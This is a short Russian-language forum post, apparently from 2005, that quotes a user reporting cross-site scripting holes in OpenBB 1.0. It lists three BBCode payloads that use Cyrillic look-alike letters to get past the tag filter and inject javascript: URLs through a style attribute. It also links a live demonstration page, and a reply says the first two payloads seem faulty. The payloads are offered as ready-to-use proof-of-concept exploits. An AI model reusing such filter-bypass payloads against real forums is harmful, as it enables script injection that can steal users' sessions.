23.05.2005, 21:03
|
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916
Репутация:
0
|
|
Сообщение от KEZ
OpenBB 1.0 (уязвимы возможно и другие версии)
Травиально.
как всегда через руские буквы
Код:
[еmаil=]aaa[/emаil]`style=background:url(javascript:alert());
[cоlor=a]a[/colоr]`style=background:url(javascript:alert());
[sizе=[cоlor=a=`]a[/cоlor]]a[/sizе]`style=background:url(javascript:alert());
Есть ещё XSS, в основном с использованием других тегов,
найти их очень просто, я их не пишу.
Пример работы уязвимости:
http://s-channel.hut.ru/forum/read.php?TID=6&page=1#87
Первые две я не совсем понял...там где-то ошибка..
|
|
|